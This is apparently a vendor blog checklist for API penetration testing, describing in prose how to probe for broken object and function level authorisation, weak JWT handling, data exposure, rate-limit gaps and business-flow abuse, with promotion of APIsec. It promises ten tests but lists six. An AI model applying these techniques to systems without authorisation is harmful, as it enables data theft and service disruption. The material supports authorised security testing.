Complete API Penetration Testing Checklist for Security Teams

API breaches happen because automated scanners can't detect business logic flaws. When T-Mobile exposed 37 million records, and Optus leaked 9.8 million customer details, both breaches stemmed from authorisation failures that no scanner flagged. This checklist provides 10 critical penetration tests that reveal the vulnerabilities attackers actually exploit, complete with testing methods, real breach examples, and the tools you need to find these issues before attackers do.

Why API Breaches Happen

When T-Mobile exposed 37 million customer records in January 2023, the vulnerability was straightforward: an API endpoint that didn't verify whether users had permission to access specific data. Authenticated? Yes. Authorized? No.

The Optus breach in Australia was even simpler. An API endpoint requiring no authentication at all. Result: 9.8 million records exposed.

Automated scanners miss these vulnerabilities because they're business logic flaws, not code defects. A scanner sees two identical requests from an authenticated user to the same endpoint. Only human testing reveals that one request accesses authorised data while the other steals someone else's information.

According to the OWASP API Security Top 10, authorisation and business logic vulnerabilities consistently rank as the most exploited patterns in real-world attacks.

Pre-Testing Setup

Map Your API Attack Surface

Start with OpenAPI specifications, Swagger files, and Postman collections. Documentation provides the foundation, but is rarely complete. Proxy your web and mobile applications through Burp Suite or OWASP ZAP to capture actual API traffic. Shadow APIs (undocumented endpoints) often lack security controls applied to documented endpoints.

Document Authentication Mechanisms

Identify how your APIs prove identity: OAuth 2.0, JWT tokens, API keys, or Basic Auth. Note where credentials are transmitted, token lifespans, and revocation processes.

Critical distinction: Authentication proves who you are. Authorisation determines what you can access. Most API breaches stem from authorisation failures.

Define Testing Boundaries

Establish clear scope: which endpoints are in scope, maximum requests per minute, approved testing windows, escalation contacts, and systems explicitly out of scope (production databases, payment processors).

Prepare Your Testing Toolkit

Essential tools for manual testing:

• APIsec for automated continuous testing that finds business logic vulnerabilities scanners miss
  
• Burp Suite Professional for traffic interception and manipulation
  
• Postman for request organisation and workflow testing
  
• OWASP ZAP is a free alternative with CI/CD integration
  
• Python with the requests library for custom attack scenarios

Critical API Penetration Tests

1. Broken Object Level Authorisation (BOLA)

BOLA occurs when APIs verify authentication but fail to check authorisation for specific resources. Create three test accounts (two regular users, one administrator).

Testing steps:

• Change user IDs in URL parameters from one user to another
• Modify object identifiers in request bodies
• Test if regular users can access admin endpoints
• Verify authorisation at each step of multi-step workflows

Example: An e-commerce API allows viewing order details through an orders endpoint. Changing the order ID from one number to another returns another customer's complete order, including name, address, and payment information.

2. Broken Authentication

Weak authentication allows attackers to bypass identity verification entirely.

Testing steps:

• Attempt to create passwords violating security policies
• Test for account lockout after multiple failed attempts
• Submit JWT tokens with algorithm set to none
• Try to crack JWT signing secrets using common wordlists
• Test if OAuth authorisation codes can be reused
• Verify tokens are invalidated on logout

Example: A financial API uses JWT tokens with a weak signing secret like "secret123". Attackers crack this using publicly available wordlists, then forge tokens for any user account.

3. Excessive Data Exposure

APIs often return complete database objects when only specific fields are needed.

Testing steps:

• Examine API responses for password hashes, internal IDs, or API keys
• Compare responses between regular users and administrators
• Attempt to modify restricted properties like role fields or account balance
• Add administrator role or verified status to profile update requests

Example: A social media API returns user profiles including email addresses and phone numbers in responses. Attackers intercept API responses to harvest millions of email addresses for phishing campaigns.

4. Unrestricted Resource Consumption

APIs without resource controls enable denial-of-service attacks or excessive data harvesting.

Testing steps:

• Send hundreds of concurrent requests and monitor response times
• Submit extremely large JSON payloads (multiple megabytes)
• Test resource-intensive endpoints like report generation or data exports
• Request maximum records without pagination limits
• Verify that rate limiting exists and can't be bypassed

Example: An e-commerce API allows product searches without rate limiting. An attacker scripts thousands of complex queries per second, overwhelming the database.

5. Broken Function Level Authorisation (BFLA)

BFLA occurs when APIs fail to restrict access to administrative functions.

Testing steps:

• Change GET requests to DELETE, PUT, or PATCH methods
• Add admin or internal paths to existing API URLs
• Include administrator flags in request bodies
• Test access to debugging endpoints

Example: A document management API allows users to view documents via a GET request. An attacker changes the method to DELETE while keeping the same URL structure and successfully deletes documents.

6. Sensitive Business Flow Protection

Critical business processes need protection from automation and abuse.

Testing steps:

• Script the complete workflow to check if CAPTCHA exists
• Test if you can apply multiple discount codes or reuse codes
• Attempt to create thousands of accounts rapidly
• Complete purchases without submitting payment
• Reserve inventory indefinitely without completing checkout

Example: A ticket marketplace API allows adding concert tickets to carts without rate limiting. Scalper bots add all available tickets to multiple carts, holding inventory while legitimate customers cannot purchase.

Essential Testing Tools

• APIsec automates comprehensive API security testing by analysing your specifications and generating thousands of intelligent attack scenarios. Unlike traditional scanners, APIsec tests business logic, authorisation patterns, and the complete OWASP API Top 10. The platform delivers real vulnerabilities with proof of exploitation, eliminating false positives that waste security team time.
  
• Burp Suite Professional remains the industry standard for manual testing. The proxy intercepts all HTTP and HTTPS traffic, the repeater modifies and replays requests, and the intruder automates attack patterns. Extensions add specialised API testing capabilities.
  
• Postman excels at API exploration. Organise requests into collections, use environment variables for multi-instance testing, and chain requests for complex workflows.
  
• OWASP ZAP provides a free alternative with strong automated scanning and good CI/CD integration capabilities.
  
• Python with the requests library gives complete control for complex scenarios, easy JWT manipulation, and multi-step attack chains.

Compare more options in our API security testing tools guide.

When to Automate API Testing

Manual penetration testing provides depth, but can't match modern development velocity. Security teams need both approaches.

Automate these tests:

• OWASP API Top 10 baseline checks
• Authentication mechanism verification
• Input validation across endpoints
• Regression testing for known vulnerabilities

Keep manual testing for:

• Complex business logic analysis
• Multi-step attack chain development
• Context-specific authorisation testing
• Novel vulnerability research

Integrate automated API security testing into CI/CD pipelines for baseline security with every release. Manual testing then focuses on deep analysis of business logic and complex attack scenarios.

Conclusion

API security requires testing for business logic flaws that automated scanners miss. This checklist covers the 10 most exploited vulnerabilities in real-world breaches, from BOLA and broken authentication to SSRF and unsafe API consumption. Security teams need both manual testing for complex authorisation issues and automated platforms for continuous coverage as development teams ship new features daily.

Start your free API security scan with APIsec to find real vulnerabilities in minutes, not weeks.

Key Takeaways

• BOLA and broken authentication cause most API breaches, but scanners miss these business logic flaws
  
• Use Burp Suite, Postman, OWASP ZAP, and APIsec to intercept and manipulate API traffic.
  
• Test authorisation at every endpoint by accessing other users' data and admin functions.
  
• Manual testing takes 1 to 2 weeks for medium APIs, while automated platforms finish in hours.
  
• Automate OWASP API Top 10 testing and use manual testing for business logic vulnerabilities
  
• Test production APIs safely with read-only operations, off-peak timing, and team coordination

FAQs

How long does API penetration testing take?

Simple APIs with 20 to 50 endpoints take 2 to 3 days. Medium APIs with 50 to 200 endpoints take 1 to 2 weeks. Complex APIs with over 200 endpoints take 2 to 4 weeks. Automated platforms complete baseline testing in hours.

How often should APIs be tested?

Test before major releases, after architecture changes, and annually for compliance. Continuous automated testing catches vulnerabilities as they're introduced rather than months later.

What's the difference between penetration testing and vulnerability scanning?

Vulnerability scanners use pattern matching to find known issues. Penetration testing applies human intelligence to find business logic flaws and context-specific vulnerabilities that scanners miss.

Can production APIs be tested safely?

Production testing is possible with precautions: use read-only operations where feasible, test during low-traffic periods, implement strict rate limiting, coordinate with operations teams, and maintain rollback procedures.